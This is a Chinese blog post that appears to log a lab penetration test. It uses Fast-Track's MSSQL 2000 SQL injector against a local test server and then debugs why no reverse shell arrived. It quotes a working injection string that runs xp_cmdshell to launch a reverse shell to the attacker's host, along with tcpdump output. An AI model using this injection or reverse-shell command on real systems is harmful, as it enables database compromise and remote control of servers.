MSSQL2K - SQL Injector - Query String Parameter Attack

最新推荐文章于 2023-05-18 00:07:42 发布
最新推荐文章于 2023-05-18 00:07:42 发布
阅读量1k 收藏
点赞数
分类专栏: metasploit mssqlserver2000 backtrack fasttrack SQL Injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9220495
版权

操作如下:

root@root:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

    Enter your choice: 1
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Requirements: PExpect
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This module uses a reverse shell by using the binary2hex method for uploading.
    It does not require FTP or any other service, instead we are using the debug
    function in Windows to generate the executable.

    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

    So for example, when the tool asks you for the SQL Injectable URL, type:

    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
             

    Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

    Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

    <ctrl>-c to exit to Main Menu...

    Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated.  Use the subprocess module.
  ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
    Sending initial request to enable xp_cmdshell if disabled....
    Sending first portion of payload (1/4)....
    Sending second portion of payload (2/4)....
    Sending third portion of payload (3/4)...
    Sending the last portion of the payload (4/4)...
    Running cleanup before executing the payload...
    Running the payload on the server...
     You should have a shell if everything went good..Might take a couple seconds

然后就没有了,没有获得shell。

于是,查看代码fasttrack/bin/ftsrc/sqlbinarypayload.py,看到:

string26=(r"';exec master..xp_cmdshell 'reverse.exe %s 4444'--" % (ipaddr))

而且我的eclipse里的输入如下: 

select username, password, phone from tb_user where username='';exec master..xp_cmdshell 'reverse.exe 192.168.1.11 4444'--' and password='null'

用wireshark和tcpdump抓包:


tcpdump的输入如下:

root@root:/pentest/exploits/fasttrack# tcpdump port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
19:54:33.188133 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.188160 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1697364906, win 0, length 0
19:54:33.633652 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:33.633679 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:54:34.180136 IP 192.168.1.142.1112 > 192.168.1.11.4444: Flags [S], seq 1697364905, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:54:34.180159 IP 192.168.1.11.4444 > 192.168.1.142.1112: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:27.385923 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.385983 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 4267102229, win 0, length 0
19:57:27.867489 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:27.867577 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 1, win 0, length 0
19:57:28.414365 IP 192.168.1.142.1113 > 192.168.1.11.4444: Flags [S], seq 4267102228, win 64240, options [mss 1460,nop,nop,sackOK], length 0
19:57:28.414434 IP 192.168.1.11.4444 > 192.168.1.142.1113: Flags [R.], seq 0, ack 1, win 0, length 0

说明:TCP连接是打开的,但是没有打开shell,再看代码fasttrack/bin/menu/sqlinjector.py: 

   if menu == '1':
      try:
         reload(sqlbinarypayload)
      except Exception:
         pass
      import sqlbinarypayload

之后,似乎没有代码来处理建立的TCP连接。所以,没有获得shell。


feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mybatis-plus使用SqlInjector注入SQl
LinShiyang2018的博客
02-02 4853
Mybatis-plus使用SqlInjector注入SQl 1.通过ISqlInjector接口找到AbstractSqlInjector抽象实现类,再找到DefaultSqlInjector类,它是mybatis-plus的SQL 默认注入器,如果项目使用的是逻辑删除,那么可能配置的是另外一个LogicSqlInjector,我们项目使用的是LogicSqlInjector。 2.发现里面有一个List getMethodList()方法,返回一个集合,集合里面的每一个AbstractMethod就是对
Vulnerability-and-Attack-Injector:漏洞和攻击者
05-15
一种在PHP文件中注入SQL Injection漏洞并自动对其进行攻击的工具 这些文件中使用了该软件: JoséFonseca,Marco Vieira,Henrique Madeira,“使用漏洞和攻击注入的Web安全机制评估”,IEEE可靠和安全计算交易,第...
MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
天元喜羊羊的博客
07-07 1578
上次没有成功获得cmdshell,因为fasttrack没有这方面的代码,这次编写了server.py。 原来的博客链接:http://blog.csdn.net/feier7501/article/details/9220495 import socket HOST = '' PORT = 4444 s = socket.socket(socket.AF_INET, socket
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
天元喜羊羊的博客
07-08 1116
fasttrack操作: root@bt:~# cd /pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks...
深度剖析Mybatis-plus Injector SQL注入器
Java是世界上最好的语言
05-18 2410
深度剖析Mybatis-plus Injector SQL注入器
MyBatis-plus执行自定义SQL
lydms的博客
05-23 7631
还有另外24篇MySQL+MyBatis+MyBatis-plus相关文章。
Mybatis-Plus:SQL注入的原理
天行健 君子以自强不息,地势坤 君子以厚德载物。
03-15 2630
Mybatis-Plus:SQL注入的原理
Mybatis-Plus 注入 SQL 原理分析
养歌的博客
06-01 2840
MyBatis-Plus 是一个 MyBatis 的增强工具,在 MyBatis 的基础上只做增强不做改变,为简化开发、提高效率而生。那么 MyBatis-Plus 是怎么加强的呢?其实就是封装好了一些 crud 方法,开发人员不需要再写 SQL 了,间接调用方法就可以获取到封装好的 SQL 语句。特性:下面我们先从一个简单的 demo 入手,来感受一下 MyBatis-plus 的便捷性。 实体类对象 UserMapper 继承 BaseMapper 接口 测试 最终查询的 SQL 语句如下图: 从
dapr源码分析--injector
cbmljs的博客
10-28 795
在阅读dapr injector源码之前,需要知道k8s的动态准入控制原理,否则无法理解代码的功能。
SQL Injector - POST Parameter Attack
天元喜羊羊的博客
07-08 1328
login.jsp如下: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> Register user username: password: bt5上操作如下: root@bt:/pentest/exploits/fasttrack
手工盲注辅助注入工具Blind-SQL-Injector.zip
最新发布
07-18
2. **下载工具**:从提供的压缩包Blind-SQL-Injector-master中解压获取源代码。 3. **代码编译与运行**:在命令行中导航到源代码目录,运行Python脚本来启动工具。 4. **配置注入参数**:根据目标网站的特性设置...
authlib-injector:构建自己的Minecraft身份验证系统
02-04
取得您可以从获取最新的authlib-injector。建立构建依赖:Gradle,JDK 8+。执行以下命令: gradle构建输出放在build/libs下。部署通过添加以下JVM参数来配置: -javaagent:{authlib-injector.jar 的路径}={验证...
k8s-env-injector
04-10
Kubernetes ENV喷油器 k8s-env-injector的目的是将节点标签作为环境变量注入到选定名称空间中的k8s-env-...> export ENV_INJECTOR_NAMESPACE= " namespace-where-env-injector-will-be-deployed-to " > export EN
k8s-sidecar-injector:Kubernetes边车注入服务
02-03
为了解决这个问题,我们编写了k8s-sidecar-injector 。 这是一个小型服务,它在每个Kubernetes集群中运行,并通过webhooks监听Kubernetes API。 对于每个吊舱创建,注入程序都会获得一个(变异入场)webhook,询问...
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
metasploit运行run vnc
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8044
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
Acunetix-WVS中文教程:深度详解安全扫描与设置
- **Blind SQL Injector**:一种特定的注入技术,用于探测数据库漏洞,即使没有明确的参数提示也能运行。 **4. 工具组件** 教程还介绍了Acunetix WVS提供的多种实用工具,包括WebScanner(针对单个页面的快速扫描)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值